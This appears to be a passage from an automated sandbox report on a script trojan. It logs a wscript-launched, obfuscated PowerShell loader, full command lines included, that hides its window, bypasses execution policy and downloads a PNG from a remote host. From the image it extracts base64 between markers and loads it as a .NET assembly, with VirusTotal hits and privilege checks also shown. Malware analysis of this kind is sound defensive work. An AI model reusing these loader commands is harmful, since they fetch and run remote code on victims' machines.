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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" filepath: powershell	1	1
CreateProcessInternalW Oct. 19, 2023, 6:25 p.m.	thread_identifier: 2344 thread_handle: 0x0000043c process_identifier: 2348 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmduaW5pbmlnZWJ3ZW4vNjMyLjM1Mi42NTEuNDkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000440	1	1

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

Kaspersky	HEUR:Trojan.Script.Generic
Google	Detected
Ikarus	Trojan-Downloader.VBS.Agent

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 19, 2023, 6:25 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (2 events)

Data sent	tpe0ö¬ã4¥ýÀ«îuú]Û&7³ïH È;ù±)í/5 ÀÀÀ À 28/ÿwallpapercave.com
Data sent	tpe0öÛ`Îå÷!zÑ«£Xá[ÅÏàæ6KÀÔ/5 ÀÀÀ À 28/ÿwallpapercave.com

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 19, 2023, 6:25 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Oct. 19, 2023, 6:25 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send Oct. 19, 2023, 6:25 p.m.	buffer: tpe0ö¬ã4¥ýÀ«îuú]Û&7³ïH È;ù±)í/5 ÀÀÀ À 28/ÿwallpapercave.com socket: 1424 sent: 121	1	121	0
send Oct. 19, 2023, 6:25 p.m.	buffer: tpe0öÛ`Îå÷!zÑ«£Xá[ÅÏàæ6KÀÔ/5 ÀÀÀ À 28/ÿwallpapercave.com socket: 1424 sent: 121	1	121	0

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4082989.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmduaW5pbmlnZWJ3ZW4vNjMyLjM1Mi42NTEuNDkvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JAuOvhPbYLBpAuOvhPbYLG0AuOvhPbYLYQBnAuOvhPbYLGUAuOvhPbYLVQByAuOvhPbYLGwAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBoAuOvhPbYLHQAuOvhPbYLdAuOvhPbYLBwAuOvhPbYLHMAuOvhPbYLOgAuOvhPbYLvAuOvhPbYLC8AuOvhPbYLdwBhAuOvhPbYLGwAuOvhPbYLbAuOvhPbYLBwAuOvhPbYLGEAuOvhPbYLcAuOvhPbYLBlAuOvhPbYLHIAuOvhPbYLYwBhAuOvhPbYLHYAuOvhPbYLZQAuOvhPbYLuAuOvhPbYLGMAuOvhPbYLbwBtAuOvhPbYLC8AuOvhPbYLdQB3AuOvhPbYLHAuOvhPbYLAuOvhPbYLLwB1AuOvhPbYLHcAuOvhPbYLcAuOvhPbYLAuOvhPbYL0AuOvhPbYLDAuOvhPbYLAuOvhPbYLOAuOvhPbYLAuOvhPbYLyAuOvhPbYLDkAuOvhPbYLOAuOvhPbYLAuOvhPbYL5AuOvhPbYLC4AuOvhPbYLcAuOvhPbYLBuAuOvhPbYLGcAuOvhPbYLJwAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLdwBlAuOvhPbYLGIAuOvhPbYLQwBsAuOvhPbYLGkAuOvhPbYLZQBuAuOvhPbYLHQAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLTgBlAuOvhPbYLHcAuOvhPbYLLQBPAuOvhPbYLGIAuOvhPbYLagBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLTgBlAuOvhPbYLHQAuOvhPbYLLgBXAuOvhPbYLGUAuOvhPbYLYgBDAuOvhPbYLGwAuOvhPbYLaQBlAuOvhPbYLG4AuOvhPbYLdAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLAuOvhPbYLkAuOvhPbYLHcAuOvhPbYLZQBiAuOvhPbYLEMAuOvhPbYLbAuOvhPbYLBpAuOvhPbYLGUAuOvhPbYLbgB0AuOvhPbYLC4AuOvhPbYLRAuOvhPbYLBvAuOvhPbYLHcAuOvhPbYLbgBsAuOvhPbYLG8AuOvhPbYLYQBkAuOvhPbYLEQAuOvhPbYLYQB0AuOvhPbYLGEAuOvhPbYLKAuOvhPbYLAuOvhPbYLkAuOvhPbYLGkAuOvhPbYLbQBhAuOvhPbYLGcAuOvhPbYLZQBVAuOvhPbYLHIAuOvhPbYLbAuOvhPbYLAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLBpAuOvhPbYLG0AuOvhPbYLYQBnAuOvhPbYLGUAuOvhPbYLVAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLVAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLdAuOvhPbYLAuOvhPbYLuAuOvhPbYLEUAuOvhPbYLbgBjAuOvhPbYLG8AuOvhPbYLZAuOvhPbYLBpAuOvhPbYLG4AuOvhPbYLZwBdAuOvhPbYLDoAuOvhPbYLOgBVAuOvhPbYLFQAuOvhPbYLRgAuOvhPbYL4AuOvhPbYLC4AuOvhPbYLRwBlAuOvhPbYLHQAuOvhPbYLUwB0AuOvhPbYLHIAuOvhPbYLaQBuAuOvhPbYLGcAuOvhPbYLKAuOvhPbYLAuOvhPbYLkAuOvhPbYLGkAuOvhPbYLbQBhAuOvhPbYLGcAuOvhPbYLZQBCAuOvhPbYLHkAuOvhPbYLdAuOvhPbYLBlAuOvhPbYLHMAuOvhPbYLKQAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwAuOvhPbYL8AuOvhPbYLDwAuOvhPbYLQgBBAuOvhPbYLFMAuOvhPbYLRQAuOvhPbYL2AuOvhPbYLDQAuOvhPbYLXwBTAuOvhPbYLFQAuOvhPbYLQQBSAuOvhPbYLFQAuOvhPbYLPgAuOvhPbYL+AuOvhPbYLCcAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLGUAuOvhPbYLbgBkAuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwAuOvhPbYL8AuOvhPbYLDwAuOvhPbYLQgBBAuOvhPbYLFMAuOvhPbYLRQAuOvhPbYL2AuOvhPbYLDQAuOvhPbYLXwBFAuOvhPbYLE4AuOvhPbYLRAuOvhPbYLAuOvhPbYL+AuOvhPbYLD4AuOvhPbYLJwAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLAuOvhPbYLkAuOvhPbYLGkAuOvhPbYLbQBhAuOvhPbYLGcAuOvhPbYLZQBUAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLB0AuOvhPbYLC4AuOvhPbYLSQBuAuOvhPbYLGQAuOvhPbYLZQB4AuOvhPbYLE8AuOvhPbYLZgAuOvhPbYLoAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLKQAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLZQBuAuOvhPbYLGQAuOvhPbYLSQBuAuOvhPbYLGQAuOvhPbYLZQB4AuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLFQAuOvhPbYLZQB4AuOvhPbYLHQAuOvhPbYLLgBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLTwBmAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBGAuOvhPbYLGwAuOvhPbYLYQBnAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLHMAuOvhPbYLdAuOvhPbYLBhAuOvhPbYLHIAuOvhPbYLdAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGcAuOvhPbYLZQAuOvhPbYLgAuOvhPbYLDAuOvhPbYLAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLGcAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYLgAuOvhPbYLCsAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEYAuOvhPbYLbAuOvhPbYLBhAuOvhPbYLGcAuOvhPbYLLgBMAuOvhPbYLGUAuOvhPbYLbgBnAuOvhPbYLHQAuOvhPbYLaAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLYgBhAuOvhPbYLHMAuOvhPbYLZQAuOvhPbYL2AuOvhPbYLDQAuOvhPbYLTAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZwB0AuOvhPbYLGgAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBlAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBJAuOvhPbYLG4AuOvhPbYLZAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLIAuOvhPbYLAuOvhPbYLtAuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBzAuOvhPbYLHQAuOvhPbYLYQByAuOvhPbYLHQAuOvhPbYLSQBuAuOvhPbYLGQAuOvhPbYLZQB4AuOvhPbYLDsAuOvhPbYLJAuOvhPbYLBiAuOvhPbYLGEAuOvhPbYLcwBlAuOvhPbYLDYAuOvhPbYLNAuOvhPbYLBDAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLFQAuOvhPbYLZQB4AuOvhPbYLHQAuOvhPbYLLgBTAuOvhPbYLHUAuOvhPbYLYgBzAuOvhPbYLHQAuOvhPbYLcgBpAuOvhPbYLG4AuOvhPbYLZwAuOvhPbYLoAuOvhPbYLCQAuOvhPbYLcwB0AuOvhPbYLGEAuOvhPbYLcgB0AuOvhPbYLEkAuOvhPbYLbgBkAuOvhPbYLGUAuOvhPbYLeAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJAuOvhPbYLBiAuOvhPbYLGEAuOvhPbYLcwBlAuOvhPbYLDYAuOvhPbYLNAuOvhPbYLBMAuOvhPbYLGUAuOvhPbYLbgBnAuOvhPbYLHQAuOvhPbYLaAuOvhPbYLAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLBjAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLQwBvAuOvhPbYLG4AuOvhPbYLdgBlAuOvhPbYLHIAuOvhPbYLdAuOvhPbYLBdAuOvhPbYLDoAuOvhPbYLOgBGAuOvhPbYLHIAuOvhPbYLbwBtAuOvhPbYLEIAuOvhPbYLYQBzAuOvhPbYLGUAuOvhPbYLNgAuOvhPbYL0AuOvhPbYLFMAuOvhPbYLdAuOvhPbYLByAuOvhPbYLGkAuOvhPbYLbgBnAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBiAuOvhPbYLGEAuOvhPbYLcwBlAuOvhPbYLDYAuOvhPbYLNAuOvhPbYLBDAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLGwAuOvhPbYLbwBhAuOvhPbYLGQAuOvhPbYLZQBkAuOvhPbYLEEAuOvhPbYLcwBzAuOvhPbYLGUAuOvhPbYLbQBiAuOvhPbYLGwAuOvhPbYLeQAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLUgBlAuOvhPbYLGYAuOvhPbYLbAuOvhPbYLBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLBpAuOvhPbYLG8AuOvhPbYLbgAuOvhPbYLuAuOvhPbYLEEAuOvhPbYLcwBzAuOvhPbYLGUAuOvhPbYLbQBiAuOvhPbYLGwAuOvhPbYLeQBdAuOvhPbYLDoAuOvhPbYLOgBMAuOvhPbYLG8AuOvhPbYLYQBkAuOvhPbYLCgAuOvhPbYLJAuOvhPbYLBjAuOvhPbYLG8AuOvhPbYLbQBtAuOvhPbYLGEAuOvhPbYLbgBkAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLB0AuOvhPbYLHkAuOvhPbYLcAuOvhPbYLBlAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLbAuOvhPbYLBvAuOvhPbYLGEAuOvhPbYLZAuOvhPbYLBlAuOvhPbYLGQAuOvhPbYLQQBzAuOvhPbYLHMAuOvhPbYLZQBtAuOvhPbYLGIAuOvhPbYLbAuOvhPbYLB5AuOvhPbYLC4AuOvhPbYLRwBlAuOvhPbYLHQAuOvhPbYLVAuOvhPbYLB5AuOvhPbYLHAuOvhPbYLAuOvhPbYLZQAuOvhPbYLoAuOvhPbYLCcAuOvhPbYLRgBpAuOvhPbYLGIAuOvhPbYLZQByAuOvhPbYLC4AuOvhPbYLSAuOvhPbYLBvAuOvhPbYLG0AuOvhPbYLZQAuOvhPbYLnAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLG0AuOvhPbYLZQB0AuOvhPbYLGgAuOvhPbYLbwBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLdAuOvhPbYLB5AuOvhPbYLHAuOvhPbYLAuOvhPbYLZQAuOvhPbYLuAuOvhPbYLEcAuOvhPbYLZQB0AuOvhPbYLE0AuOvhPbYLZQB0AuOvhPbYLGgAuOvhPbYLbwBkAuOvhPbYLCgAuOvhPbYLJwBWAuOvhPbYLEEAuOvhPbYLSQAuOvhPbYLnAuOvhPbYLCkAuOvhPbYLLgBJAuOvhPbYLG4AuOvhPbYLdgBvAuOvhPbYLGsAuOvhPbYLZQAuOvhPbYLoAuOvhPbYLCQAuOvhPbYLbgB1AuOvhPbYLGwAuOvhPbYLbAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLWwBvAuOvhPbYLGIAuOvhPbYLagBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLBbAuOvhPbYLF0AuOvhPbYLXQAuOvhPbYLgAuOvhPbYLCgAuOvhPbYLJwBkAuOvhPbYLEgAuOvhPbYLaAuOvhPbYLAuOvhPbYLwAuOvhPbYLEwAuOvhPbYLbQBkAuOvhPbYLHUAuOvhPbYLYQBXAuOvhPbYLDUAuOvhPbYLcAuOvhPbYLBiAuOvhPbYLG0AuOvhPbYLbAuOvhPbYLBuAuOvhPbYLFoAuOvhPbYLVwBKAuOvhPbYLDMAuOvhPbYLWgBXAuOvhPbYLDQAuOvhPbYLdgBOAuOvhPbYLGoAuOvhPbYLTQB5AuOvhPbYLEwAuOvhPbYLagBNAuOvhPbYLDEAuOvhPbYLTQBpAuOvhPbYLDQAuOvhPbYLMgBOAuO